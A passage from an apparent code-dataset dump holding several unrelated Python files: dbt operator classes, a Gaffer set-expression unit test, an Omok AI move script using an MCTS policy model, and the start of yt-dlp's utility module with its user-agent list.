        super().__init__(**kwargs)
        # Attach each dbt-specific argument so args_list() can pick it up.
        for attr, value in (
            ("parse_only", parse_only),
            ("full_refresh", full_refresh),
            ("models", models),
            ("fail_fast", fail_fast),
            ("threads", threads),
            ("exclude", exclude),
            ("selector", selector),
            ("state", state),
        ):
            setattr(self, attr, value)
class DbtDepsOperator(DbtBaseOperator):
    """Executes the ``dbt deps`` command to install project package dependencies.

    Takes no command-specific flags; only the base operator's arguments apply.
    """
    command = "deps"
    def __init__(self, **kwargs) -> None:
        super().__init__(**kwargs)
class DbtCleanOperator(DbtBaseOperator):
    """Executes the ``dbt clean`` command to delete dbt's configured clean-targets.

    Takes no command-specific flags; only the base operator's arguments apply.
    """
    command = "clean"
    def __init__(self, **kwargs) -> None:
        super().__init__(**kwargs)
class DbtDebugOperator(DbtBaseOperator):
    """Runs the ``dbt debug`` command to test configuration and connectivity."""
    command = "debug"
    # Command-specific flags, appended to the base operator's flag list.
    __dbt_args__ = DbtBaseOperator.__dbt_args__ + ["config_dir", "no_version_check"]
    def __init__(
        self,
        config_dir: Optional[bool] = None,
        no_version_check: Optional[bool] = None,
        **kwargs,
    ) -> None:
        super().__init__(**kwargs)
        # Attach each dbt-specific argument so args_list() can pick it up.
        for attr, value in (
            ("config_dir", config_dir),
            ("no_version_check", no_version_check),
        ):
            setattr(self, attr, value)
class DbtSnapshotOperator(DbtBaseOperator):
    """Runs the ``dbt snapshot`` command.

    Arguments mirror the ``dbt snapshot`` CLI flags; None values are omitted
    from the generated command line by args_list().
    """
    command = "snapshot"
    # Command-specific flags, appended to the base operator's flag list.
    __dbt_args__ = DbtBaseOperator.__dbt_args__ + [
        "select",
        "threads",
        "exclude",
        "selector",
        "state",
    ]
    def __init__(
        self,
        select: Optional[list[str]] = None,
        threads: Optional[int] = None,
        exclude: Optional[list[str]] = None,
        selector: Optional[str] = None,
        state: Optional[Union[str, Path]] = None,
        **kwargs,
    ) -> None:
        super().__init__(**kwargs)
        # Attach each dbt-specific argument so args_list() can pick it up.
        for attr, value in (
            ("select", select),
            ("threads", threads),
            ("exclude", exclude),
            ("selector", selector),
            ("state", state),
        ):
            setattr(self, attr, value)
class DbtLsOperator(DbtBaseOperator):
    """Runs the ``dbt ls`` (list) command.

    Arguments mirror the ``dbt ls`` CLI flags; None values are omitted from
    the generated command line by args_list(). ``dbt_output`` is stored under
    that name (and stripped back to ``--output`` by args_list) to avoid
    clashing with BaseOperator attributes.
    """
    command = "ls"
    # Command-specific flags, appended to the base operator's flag list.
    __dbt_args__ = DbtBaseOperator.__dbt_args__ + [
        "resource_type",
        "select",
        "models",
        "exclude",
        "selector",
        "dbt_output",
    ]
    def __init__(
        self,
        resource_type: Optional[list[str]] = None,
        select: Optional[list[str]] = None,
        models: Optional[list[str]] = None,
        exclude: Optional[list[str]] = None,
        selector: Optional[str] = None,
        dbt_output: Optional[str] = None,
        **kwargs,
    ) -> None:
        super().__init__(**kwargs)
        # Attach each dbt-specific argument so args_list() can pick it up.
        for attr, value in (
            ("resource_type", resource_type),
            ("select", select),
            ("models", models),
            ("exclude", exclude),
            ("selector", selector),
            ("dbt_output", dbt_output),
        ):
            setattr(self, attr, value)
# Convenience alias: dbt accepts both `ls` and `list` for the same command.
DbtListOperator = DbtLsOperator
def run_result_factory(data: list[tuple[Any, Any]]):
    """dict_factory for dataclasses.asdict that yields JSON-serializable values.

    datetimes are rendered as ISO-8601 strings, and agate Tables are reduced
    to a {column name: column type name} mapping; all other values pass
    through unchanged.
    """
    result = {}
    for key, value in data:
        if isinstance(value, dt.datetime):
            result[key] = value.isoformat()
        elif isinstance(value, agate.table.Table):
            # agate Tables only offer plain-text or to_json renderings, and
            # shipping a whole table through XCom is a bad idea -- keep just
            # the schema instead.
            result[key] = {
                name: col_type.__class__.__name__
                for name, col_type in zip(value._column_names, value._column_types)
            }
        else:
            result[key] = value
    return result
| 30.63067 | 88 | 0.590396 |
795c55fbef1712060b8c3014d53d8d0e07fb77d6 | 7,913 | py | Python | python/GafferSceneTest/SetAlgoTest.py | ivanimanishi/gaffer | 7cfd79d2f20c25ed1d680730de9d6a2ee356dd4c | [
"BSD-3-Clause"
] | 1 | 2019-08-02T16:49:59.000Z | 2019-08-02T16:49:59.000Z | python/GafferSceneTest/SetAlgoTest.py | rkoschmitzky/gaffer | ec6262ae1292767bdeb9520d1447d65a4a511884 | [
"BSD-3-Clause"
] | 2 | 2017-08-23T21:35:45.000Z | 2018-01-29T08:59:33.000Z | python/GafferSceneTest/SetAlgoTest.py | rkoschmitzky/gaffer | ec6262ae1292767bdeb9520d1447d65a4a511884 | [
"BSD-3-Clause"
] | 1 | 2020-12-21T12:33:49.000Z | 2020-12-21T12:33:49.000Z | ##########################################################################
#
# Copyright (c) 2017, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import functools
import IECore
import GafferScene
import GafferSceneTest
class SetAlgoTest( GafferSceneTest.SceneTestCase ) :
def test( self ) :
sphere1 = GafferScene.Sphere( "Sphere1" )
sphere1["name"].setValue( 'sphere1' )
sphere2 = GafferScene.Sphere( "Sphere2" )
sphere2["name"].setValue( 'sphere2' )
sphere3 = GafferScene.Sphere( "Sphere3" )
sphere3["name"].setValue( 'sphere3' )
group1 = GafferScene.Group( "Group1" )
group1["in"].addChild( GafferScene.ScenePlug( "in1" ) )
group1["in"].addChild( GafferScene.ScenePlug( "in2" ) )
group1["in"]["in0"].setInput( sphere1["out"] )
group1["in"]["in1"].setInput( sphere2["out"] )
setA = GafferScene.Set( "SetA" )
setA["name"].setValue( 'setA' )
setA["paths"].setValue( IECore.StringVectorData( [ '/group/sphere1', '/group/sphere2' ] ) )
setB = GafferScene.Set( "SetB" )
setB["name"].setValue( 'setB' )
setB["paths"].setValue( IECore.StringVectorData( [ '/group/sphere2' ] ) )
setC = GafferScene.Set( "SetC" )
setC["name"].setValue( 'setC' )
setC["paths"].setValue( IECore.StringVectorData( [ '/sphere3' ] ) )
setD = GafferScene.Set( "SetD" )
setD["name"].setValue( 'setD' )
setD["paths"].setValue( IECore.StringVectorData( [] ) )
group2 = GafferScene.Group( "Group2" )
group2["in"].addChild( GafferScene.ScenePlug( "in1" ) )
group2["in"].addChild( GafferScene.ScenePlug( "in2" ) )
group2["in"].addChild( GafferScene.ScenePlug( "in3" ) )
setA["in"].setInput( group1["out"] )
setB["in"].setInput( setA["out"] )
setC["in"].setInput( sphere3["out"] )
setD["in"].setInput( setC["out"] )
group2["in"]["in0"].setInput( setB["out"] )
group2["in"]["in2"].setInput( setD["out"] )
# Set memberships:
# A: ( /group/group/sphere1, /group/group/sphere2 )
# B: ( /group/group/sphere2 )
# C: ( /group/sphere3 )
# D: ( )
expressionCheck = functools.partial( self.assertCorrectEvaluation, group2["out"] )
expressionCheck( '', [] )
expressionCheck( 'setA', [ '/group/group/sphere1', '/group/group/sphere2' ] )
expressionCheck( '/group/sphere3', [ '/group/sphere3' ] )
# Test expressions that contain only sets and have a clearly defined evaluation order
expressionCheck( '(setA | setC)', [ '/group/group/sphere1', '/group/group/sphere2', '/group/sphere3' ] )
expressionCheck( '(setA | setB)', [ '/group/group/sphere1', '/group/group/sphere2' ] )
expressionCheck( '(setA & setB)', [ '/group/group/sphere2' ] )
expressionCheck( '(setA & setC)', [] )
expressionCheck( '(setA | setB) & setD', [] )
expressionCheck( '(setA & setB) | setD', [ '/group/group/sphere2' ] )
expressionCheck( '(setA - setB)', [ '/group/group/sphere1' ] )
expressionCheck( '(setA - setC)', [ '/group/group/sphere1', '/group/group/sphere2'] )
expressionCheck( '(setB - setC)', [ '/group/group/sphere2' ] )
# Test expressions that omit the explicit grouping and rely on operator precedence
expressionCheck( 'setA setC', [ '/group/group/sphere1', '/group/group/sphere2', '/group/sphere3' ] )
expressionCheck( 'setA | setB | setC', [ '/group/group/sphere1', '/group/group/sphere2', '/group/sphere3' ] )
expressionCheck( 'setA | setB & setC', [ '/group/group/sphere1', '/group/group/sphere2' ] )
expressionCheck( 'setA & setB | setC', [ '/group/group/sphere2', '/group/sphere3' ] )
expressionCheck( 'setA & setB - setC', [ '/group/group/sphere2' ] )
expressionCheck( 'setA - setB | setC', [ '/group/group/sphere1', '/group/sphere3' ] )
# Test more complex expressions that contain explicit object names and lists thereof
expressionCheck( '/group/light1 /group/light2', [ '/group/light1', '/group/light2' ] )
expressionCheck( '(/group/light1 /group/light2)', [ '/group/light1', '/group/light2' ] )
expressionCheck( '/group/light1 /group/light2 setA', [ '/group/light1', '/group/light2', '/group/group/sphere1', '/group/group/sphere2' ] )
expressionCheck( '(/group/light1 /group/light2) | setA', [ '/group/light1', '/group/light2', '/group/group/sphere1', '/group/group/sphere2' ] )
expressionCheck( 'setA & (/group/group/sphere1 /group/group/sphere42)', [ '/group/group/sphere1' ] )
expressionCheck( 'setA - /group/group/sphere2', [ '/group/group/sphere1' ] )
expressionCheck( '(setA - /group/group/sphere2)', [ '/group/group/sphere1' ] )
expressionCheck( 'setA - ((setC /group/group/sphere2) & setB)', [ '/group/group/sphere1' ] )
expressionCheck( '(setA - ((setC /group/group/sphere2) & setB))', [ '/group/group/sphere1' ] )
expressionCheck( 'setA - (/group/group/sphere1 /group/group/sphere2) | (setA setB setC) & setC', [ '/group/sphere3' ] )
# Test if proper exception is thrown for invalid expression
with self.assertRaises( RuntimeError ) as e :
# note the missing )
GafferScene.SetAlgo.evaluateSetExpression( 'setA - (/group/group/sphere2', group2["out"] )
self.assertEqual( str( e.exception ), 'Exception : Syntax error in indicated part of SetExpression.\nsetA - (/group/group/sphere2\n |---------------------|\n.' )
# Sets that don't exist should be replaced with an empty PathMatcher
expressionCheck( 'A', [] )
# Test that changing set contents will result in an updated hash
h = GafferScene.SetAlgo.setExpressionHash( "setA", group2["out"] )
setA["paths"].setValue( IECore.StringVectorData( [ '/group/sphere1' ] ) )
self.assertNotEqual( h, GafferScene.SetAlgo.setExpressionHash( "setA", group2["out"] ) )
def testColonInSetAndObjectNames( self ):
sphere1 = GafferScene.Sphere( "Sphere1" )
sphere1["name"].setValue( 'MyObject:sphere1' )
setA = GafferScene.Set( "SetA" )
setA["name"].setValue( "MySets:setA" )
setA["paths"].setValue( IECore.StringVectorData( [ "/MyObject:sphere1" ] ) )
self.assertCorrectEvaluation( setA["out"], "MySets:setA", [ "/MyObject:sphere1" ] )
self.assertCorrectEvaluation( setA["out"], "/MyObject:sphere1", [ "/MyObject:sphere1" ] )
def assertCorrectEvaluation( self, scenePlug, expression, expectedContents ) :
    """Assert that evaluating `expression` against `scenePlug` yields exactly
    the paths in `expectedContents` (order-insensitive)."""
    matcher = GafferScene.SetAlgo.evaluateSetExpression( expression, scenePlug )
    self.assertEqual( set( matcher.paths() ), set( expectedContents ) )
| 47.668675 | 167 | 0.671174 |
795c562478cbd534b60a7df58f11dc300fed9342 | 2,136 | py | Python | app.py | sewon0918/pj4 | 144996e7f99e7639f1fffb34770ab9713307428d | [
"MIT"
] | null | null | null | app.py | sewon0918/pj4 | 144996e7f99e7639f1fffb34770ab9713307428d | [
"MIT"
] | null | null | null | app.py | sewon0918/pj4 | 144996e7f99e7639f1fffb34770ab9713307428d | [
"MIT"
] | null | null | null | from __future__ import print_function
import sys
import pickle
import numpy
#import torch
from game import Board, Game
from mcts_pure import MCTSPlayer as MCTS_Pure
from mcts_alphaZero import MCTSPlayer
from collections import OrderedDict
from policy_value_net_numpy import PolicyValueNetNumpy
# from policy_value_net_pytorch import PolicyValueNet # Pytorch
# from policy_value_net_tensorflow import PolicyValueNet # Tensorflow
# from policy_value_net_keras import PolicyValueNet # Keras
# Raw CLI arguments passed in by the host app:
# [p1_moves, p2_moves, board_selector] (see parse() below).
input_from_app = sys.argv[1:]
# Pre-trained policy models, indexed by the board selector (0 -> 10x10, 1 -> 8x8).
model_file_list = ['./Omok/pj4/best_policy_10_10_5.model', './Omok/pj4/best_policy_8_8_5.model']
# Number of stones in a row needed to win.
n = 5
# Board side lengths matching model_file_list by index.
length_list = [10, 8]
def parse(inputs):
    """Parse the three raw CLI arguments coming from the app.

    Args:
        inputs: sequence of three strings:
            [0] player-1 move indices as a comma-separated string, or ' ' if none
            [1] player-2 move indices as a comma-separated string, or ' ' if none
            [2] board/AI selector as a decimal string

    Returns:
        (p1list, p2list, board_index): the move lists as lists of ints — or
        the literal ' ' sentinel passed through when that player has not
        moved yet — and board_index as an int.
    """
    def _to_moves(raw):
        # ' ' is the app's sentinel for "no moves yet"; pass it through unchanged.
        # (The original duplicated this split-and-int loop for each player.)
        return raw if raw == ' ' else [int(token) for token in raw.split(',')]

    return (_to_moves(inputs[0]), _to_moves(inputs[1]), int(inputs[2]))
def makemap(input1, input2):
    """Rebuild a Board reflecting the moves already played.

    input1/input2 are the move-index lists for player 1 and player 2, or the
    ' ' sentinel when that player has not moved yet.  Returns the Board with
    current_player set to 1 (it is player 1's — the AI's — turn).
    """
    board = Board(width=width, height=height, n_in_row=n)
    board.init_board(start_player=0)
    # Replay each player's moves onto the fresh board.
    for moves, player in ((input1, 1), (input2, 2)):
        if moves == ' ':
            continue  # sentinel: this player has no moves yet
        for pos in moves:
            board.states[pos] = player
            board.availables.remove(pos)
    board.current_player = 1
    return board
# Decode the CLI arguments and rebuild the game state.
parsed_input1, parsed_input2, ai= parse(input_from_app)
# Board dimensions follow the selected model (0 -> 10x10, 1 -> 8x8).
width = height = length_list[ai]
board = makemap(parsed_input1, parsed_input2)
model_file = model_file_list[ai]
try:
    # Model weights were pickled; the py3 load of a py2 pickle needs
    # encoding='bytes', hence the fallback below.
    policy_param = pickle.load(open(model_file, 'rb'))
except:  # NOTE(review): bare except also hides I/O errors — consider narrowing
    policy_param = pickle.load(open(model_file, 'rb'), encoding='bytes')  # To support python3
best_policy = PolicyValueNetNumpy(width, height, policy_param)
mcts_player = MCTSPlayer(best_policy.policy_value_fn, c_puct=5, n_playout=400)  # set larger n_playout for better performance
# Emit the AI's chosen move on stdout for the host app to read.
print(mcts_player.get_action(board))
sys.stdout.flush()
795c5632ffe8f88e9d41b52932c34b5ac2538826 | 188,338 | py | Python | yt_dlp/utils.py | TpmKranz/yt-dlp | 182b6ae8a6b12ad49f2fa880f8db436f9a79a8ba | [
"Unlicense"
] | 5 | 2021-08-24T17:08:12.000Z | 2022-03-03T13:06:09.000Z | yt_dlp/utils.py | ZizzyDizzyMC/yt-dlp | 5483c29b3a6ba527375c8deb02905c0d16e252ef | [
"Unlicense"
] | null | null | null | yt_dlp/utils.py | ZizzyDizzyMC/yt-dlp | 5483c29b3a6ba527375c8deb02905c0d16e252ef | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python3
# coding: utf-8
from __future__ import unicode_literals
import base64
import binascii
import calendar
import codecs
import collections
import contextlib
import ctypes
import datetime
import email.utils
import email.header
import errno
import functools
import gzip
import imp
import io
import itertools
import json
import locale
import math
import operator
import os
import platform
import random
import re
import socket
import ssl
import subprocess
import sys
import tempfile
import time
import traceback
import xml.etree.ElementTree
import zlib
from .compat import (
compat_HTMLParseError,
compat_HTMLParser,
compat_HTTPError,
compat_basestring,
compat_chr,
compat_cookiejar,
compat_ctypes_WINFUNCTYPE,
compat_etree_fromstring,
compat_expanduser,
compat_html_entities,
compat_html_entities_html5,
compat_http_client,
compat_integer_types,
compat_numeric_types,
compat_kwargs,
compat_os_name,
compat_parse_qs,
compat_shlex_quote,
compat_str,
compat_struct_pack,
compat_struct_unpack,
compat_urllib_error,
compat_urllib_parse,
compat_urllib_parse_urlencode,
compat_urllib_parse_urlparse,
compat_urllib_parse_urlunparse,
compat_urllib_parse_quote,
compat_urllib_parse_quote_plus,
compat_urllib_parse_unquote_plus,
compat_urllib_request,
compat_urlparse,
compat_xpath,
)
from .socks import (
ProxyType,
sockssocket,
)
def register_socks_protocols():
    """Teach urlparse that SOCKS URL schemes carry a netloc.

    In Python < 2.6.5, urlsplit() suffers from bug
    https://bugs.python.org/issue7904 — URLs whose scheme is not listed in
    urlparse.uses_netloc are not split correctly, so the SOCKS schemes are
    appended here (idempotently).
    """
    registered = compat_urlparse.uses_netloc
    for scheme in ('socks', 'socks4', 'socks4a', 'socks5'):
        if scheme not in registered:
            registered.append(scheme)
# This is not clearly defined otherwise
compiled_regex_type = type(re.compile(''))
def random_user_agent():
_USER_AGENT_TPL = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/%s Safari/537.36'
_CHROME_VERSIONS = (
'74.0.3729.129',
'76.0.3780.3',
'76.0.3780.2',
'74.0.3729.128',
'76.0.3780.1',
'76.0.3780.0',
'75.0.3770.15',
'74.0.3729.127',
'74.0.3729.126',
'76.0.3779.1',
'76.0.3779.0',
'75.0.3770.14',
'74.0.3729.125',
'76.0.3778.1',
'76.0.3778.0',
'75.0.3770.13',
'74.0.3729.124',
'74.0.3729.123',
'73.0.3683.121',
'76.0.3777.1',
'76.0.3777.0',
'75.0.3770.12',
'74.0.3729.122',
'76.0.3776.4',
'75.0.3770.11',
'74.0.3729.121',
'76.0.3776.3',
'76.0.3776.2',
'73.0.3683.120',
'74.0.3729.120',
'74.0.3729.119',
'74.0.3729.118',
'76.0.3776.1',
'76.0.3776.0',
'76.0.3775.5',
'75.0.3770.10',
'74.0.3729.117',
'76.0.3775.4',
'76.0.3775.3',
'74.0.3729.116',
'75.0.3770.9',
'76.0.3775.2',
'76.0.3775.1',
'76.0.3775.0',
'75.0.3770.8',
'74.0.3729.115',
'74.0.3729.114',
'76.0.3774.1',
'76.0.3774.0',
'75.0.3770.7',
'74.0.3729.113',
'74.0.3729.112',
'74.0.3729.111',
'76.0.3773.1',
'76.0.3773.0',
'75.0.3770.6',
'74.0.3729.110',
'74.0.3729.109',
'76.0.3772.1',
'76.0.3772.0',
'75.0.3770.5',
'74.0.3729.108',
'74.0.3729.107',
'76.0.3771.1',
'76.0.3771.0',
'75.0.3770.4',
'74.0.3729.106',
'74.0.3729.105',
'75.0.3770.3',
'74.0.3729.104',
'74.0.3729.103',
'74.0.3729.102',
'75.0.3770.2',
'74.0.3729.101',
'75.0.3770.1',
'75.0.3770.0',
'74.0.3729.100',
'75.0.3769.5',
'75.0.3769.4',
'74.0.3729.99',
'75.0.3769.3',
'75.0.3769.2',
'75.0.3768.6',
'74.0.3729.98',
'75.0.3769.1',
'75.0.3769.0',
'74.0.3729.97',
'73.0.3683.119',
'73.0.3683.118',
'74.0.3729.96',
'75.0.3768.5',
'75.0.3768.4',
'75.0.3768.3',
'75.0.3768.2',
'74.0.3729.95',
'74.0.3729.94',
'75.0.3768.1',
'75.0.3768.0',
'74.0.3729.93',
'74.0.3729.92',
'73.0.3683.117',
'74.0.3729.91',
'75.0.3766.3',
'74.0.3729.90',
'75.0.3767.2',
'75.0.3767.1',
'75.0.3767.0',
'74.0.3729.89',
'73.0.3683.116',
'75.0.3766.2',
'74.0.3729.88',
'75.0.3766.1',
'75.0.3766.0',
'74.0.3729.87',
'73.0.3683.115',
'74.0.3729.86',
'75.0.3765.1',
'75.0.3765.0',
'74.0.3729.85',
'73.0.3683.114',
'74.0.3729.84',
'75.0.3764.1',
'75.0.3764.0',
'74.0.3729.83',
'73.0.3683.113',
'75.0.3763.2',
'75.0.3761.4',
'74.0.3729.82',
'75.0.3763.1',
'75.0.3763.0',
'74.0.3729.81',
'73.0.3683.112',
'75.0.3762.1',
'75.0.3762.0',
'74.0.3729.80',
'75.0.3761.3',
'74.0.3729.79',
'73.0.3683.111',
'75.0.3761.2',
'74.0.3729.78',
'74.0.3729.77',
'75.0.3761.1',
'75.0.3761.0',
'73.0.3683.110',
'74.0.3729.76',
'74.0.3729.75',
'75.0.3760.0',
'74.0.3729.74',
'75.0.3759.8',
'75.0.3759.7',
'75.0.3759.6',
'74.0.3729.73',
'75.0.3759.5',
'74.0.3729.72',
'73.0.3683.109',
'75.0.3759.4',
'75.0.3759.3',
'74.0.3729.71',
'75.0.3759.2',
'74.0.3729.70',
'73.0.3683.108',
'74.0.3729.69',
'75.0.3759.1',
'75.0.3759.0',
'74.0.3729.68',
'73.0.3683.107',
'74.0.3729.67',
'75.0.3758.1',
'75.0.3758.0',
'74.0.3729.66',
'73.0.3683.106',
'74.0.3729.65',
'75.0.3757.1',
'75.0.3757.0',
'74.0.3729.64',
'73.0.3683.105',
'74.0.3729.63',
'75.0.3756.1',
'75.0.3756.0',
'74.0.3729.62',
'73.0.3683.104',
'75.0.3755.3',
'75.0.3755.2',
'73.0.3683.103',
'75.0.3755.1',
'75.0.3755.0',
'74.0.3729.61',
'73.0.3683.102',
'74.0.3729.60',
'75.0.3754.2',
'74.0.3729.59',
'75.0.3753.4',
'74.0.3729.58',
'75.0.3754.1',
'75.0.3754.0',
'74.0.3729.57',
'73.0.3683.101',
'75.0.3753.3',
'75.0.3752.2',
'75.0.3753.2',
'74.0.3729.56',
'75.0.3753.1',
'75.0.3753.0',
'74.0.3729.55',
'73.0.3683.100',
'74.0.3729.54',
'75.0.3752.1',
'75.0.3752.0',
'74.0.3729.53',
'73.0.3683.99',
'74.0.3729.52',
'75.0.3751.1',
'75.0.3751.0',
'74.0.3729.51',
'73.0.3683.98',
'74.0.3729.50',
'75.0.3750.0',
'74.0.3729.49',
'74.0.3729.48',
'74.0.3729.47',
'75.0.3749.3',
'74.0.3729.46',
'73.0.3683.97',
'75.0.3749.2',
'74.0.3729.45',
'75.0.3749.1',
'75.0.3749.0',
'74.0.3729.44',
'73.0.3683.96',
'74.0.3729.43',
'74.0.3729.42',
'75.0.3748.1',
'75.0.3748.0',
'74.0.3729.41',
'75.0.3747.1',
'73.0.3683.95',
'75.0.3746.4',
'74.0.3729.40',
'74.0.3729.39',
'75.0.3747.0',
'75.0.3746.3',
'75.0.3746.2',
'74.0.3729.38',
'75.0.3746.1',
'75.0.3746.0',
'74.0.3729.37',
'73.0.3683.94',
'75.0.3745.5',
'75.0.3745.4',
'75.0.3745.3',
'75.0.3745.2',
'74.0.3729.36',
'75.0.3745.1',
'75.0.3745.0',
'75.0.3744.2',
'74.0.3729.35',
'73.0.3683.93',
'74.0.3729.34',
'75.0.3744.1',
'75.0.3744.0',
'74.0.3729.33',
'73.0.3683.92',
'74.0.3729.32',
'74.0.3729.31',
'73.0.3683.91',
'75.0.3741.2',
'75.0.3740.5',
'74.0.3729.30',
'75.0.3741.1',
'75.0.3741.0',
'74.0.3729.29',
'75.0.3740.4',
'73.0.3683.90',
'74.0.3729.28',
'75.0.3740.3',
'73.0.3683.89',
'75.0.3740.2',
'74.0.3729.27',
'75.0.3740.1',
'75.0.3740.0',
'74.0.3729.26',
'73.0.3683.88',
'73.0.3683.87',
'74.0.3729.25',
'75.0.3739.1',
'75.0.3739.0',
'73.0.3683.86',
'74.0.3729.24',
'73.0.3683.85',
'75.0.3738.4',
'75.0.3738.3',
'75.0.3738.2',
'75.0.3738.1',
'75.0.3738.0',
'74.0.3729.23',
'73.0.3683.84',
'74.0.3729.22',
'74.0.3729.21',
'75.0.3737.1',
'75.0.3737.0',
'74.0.3729.20',
'73.0.3683.83',
'74.0.3729.19',
'75.0.3736.1',
'75.0.3736.0',
'74.0.3729.18',
'73.0.3683.82',
'74.0.3729.17',
'75.0.3735.1',
'75.0.3735.0',
'74.0.3729.16',
'73.0.3683.81',
'75.0.3734.1',
'75.0.3734.0',
'74.0.3729.15',
'73.0.3683.80',
'74.0.3729.14',
'75.0.3733.1',
'75.0.3733.0',
'75.0.3732.1',
'74.0.3729.13',
'74.0.3729.12',
'73.0.3683.79',
'74.0.3729.11',
'75.0.3732.0',
'74.0.3729.10',
'73.0.3683.78',
'74.0.3729.9',
'74.0.3729.8',
'74.0.3729.7',
'75.0.3731.3',
'75.0.3731.2',
'75.0.3731.0',
'74.0.3729.6',
'73.0.3683.77',
'73.0.3683.76',
'75.0.3730.5',
'75.0.3730.4',
'73.0.3683.75',
'74.0.3729.5',
'73.0.3683.74',
'75.0.3730.3',
'75.0.3730.2',
'74.0.3729.4',
'73.0.3683.73',
'73.0.3683.72',
'75.0.3730.1',
'75.0.3730.0',
'74.0.3729.3',
'73.0.3683.71',
'74.0.3729.2',
'73.0.3683.70',
'74.0.3729.1',
'74.0.3729.0',
'74.0.3726.4',
'73.0.3683.69',
'74.0.3726.3',
'74.0.3728.0',
'74.0.3726.2',
'73.0.3683.68',
'74.0.3726.1',
'74.0.3726.0',
'74.0.3725.4',
'73.0.3683.67',
'73.0.3683.66',
'74.0.3725.3',
'74.0.3725.2',
'74.0.3725.1',
'74.0.3724.8',
'74.0.3725.0',
'73.0.3683.65',
'74.0.3724.7',
'74.0.3724.6',
'74.0.3724.5',
'74.0.3724.4',
'74.0.3724.3',
'74.0.3724.2',
'74.0.3724.1',
'74.0.3724.0',
'73.0.3683.64',
'74.0.3723.1',
'74.0.3723.0',
'73.0.3683.63',
'74.0.3722.1',
'74.0.3722.0',
'73.0.3683.62',
'74.0.3718.9',
'74.0.3702.3',
'74.0.3721.3',
'74.0.3721.2',
'74.0.3721.1',
'74.0.3721.0',
'74.0.3720.6',
'73.0.3683.61',
'72.0.3626.122',
'73.0.3683.60',
'74.0.3720.5',
'72.0.3626.121',
'74.0.3718.8',
'74.0.3720.4',
'74.0.3720.3',
'74.0.3718.7',
'74.0.3720.2',
'74.0.3720.1',
'74.0.3720.0',
'74.0.3718.6',
'74.0.3719.5',
'73.0.3683.59',
'74.0.3718.5',
'74.0.3718.4',
'74.0.3719.4',
'74.0.3719.3',
'74.0.3719.2',
'74.0.3719.1',
'73.0.3683.58',
'74.0.3719.0',
'73.0.3683.57',
'73.0.3683.56',
'74.0.3718.3',
'73.0.3683.55',
'74.0.3718.2',
'74.0.3718.1',
'74.0.3718.0',
'73.0.3683.54',
'74.0.3717.2',
'73.0.3683.53',
'74.0.3717.1',
'74.0.3717.0',
'73.0.3683.52',
'74.0.3716.1',
'74.0.3716.0',
'73.0.3683.51',
'74.0.3715.1',
'74.0.3715.0',
'73.0.3683.50',
'74.0.3711.2',
'74.0.3714.2',
'74.0.3713.3',
'74.0.3714.1',
'74.0.3714.0',
'73.0.3683.49',
'74.0.3713.1',
'74.0.3713.0',
'72.0.3626.120',
'73.0.3683.48',
'74.0.3712.2',
'74.0.3712.1',
'74.0.3712.0',
'73.0.3683.47',
'72.0.3626.119',
'73.0.3683.46',
'74.0.3710.2',
'72.0.3626.118',
'74.0.3711.1',
'74.0.3711.0',
'73.0.3683.45',
'72.0.3626.117',
'74.0.3710.1',
'74.0.3710.0',
'73.0.3683.44',
'72.0.3626.116',
'74.0.3709.1',
'74.0.3709.0',
'74.0.3704.9',
'73.0.3683.43',
'72.0.3626.115',
'74.0.3704.8',
'74.0.3704.7',
'74.0.3708.0',
'74.0.3706.7',
'74.0.3704.6',
'73.0.3683.42',
'72.0.3626.114',
'74.0.3706.6',
'72.0.3626.113',
'74.0.3704.5',
'74.0.3706.5',
'74.0.3706.4',
'74.0.3706.3',
'74.0.3706.2',
'74.0.3706.1',
'74.0.3706.0',
'73.0.3683.41',
'72.0.3626.112',
'74.0.3705.1',
'74.0.3705.0',
'73.0.3683.40',
'72.0.3626.111',
'73.0.3683.39',
'74.0.3704.4',
'73.0.3683.38',
'74.0.3704.3',
'74.0.3704.2',
'74.0.3704.1',
'74.0.3704.0',
'73.0.3683.37',
'72.0.3626.110',
'72.0.3626.109',
'74.0.3703.3',
'74.0.3703.2',
'73.0.3683.36',
'74.0.3703.1',
'74.0.3703.0',
'73.0.3683.35',
'72.0.3626.108',
'74.0.3702.2',
'74.0.3699.3',
'74.0.3702.1',
'74.0.3702.0',
'73.0.3683.34',
'72.0.3626.107',
'73.0.3683.33',
'74.0.3701.1',
'74.0.3701.0',
'73.0.3683.32',
'73.0.3683.31',
'72.0.3626.105',
'74.0.3700.1',
'74.0.3700.0',
'73.0.3683.29',
'72.0.3626.103',
'74.0.3699.2',
'74.0.3699.1',
'74.0.3699.0',
'73.0.3683.28',
'72.0.3626.102',
'73.0.3683.27',
'73.0.3683.26',
'74.0.3698.0',
'74.0.3696.2',
'72.0.3626.101',
'73.0.3683.25',
'74.0.3696.1',
'74.0.3696.0',
'74.0.3694.8',
'72.0.3626.100',
'74.0.3694.7',
'74.0.3694.6',
'74.0.3694.5',
'74.0.3694.4',
'72.0.3626.99',
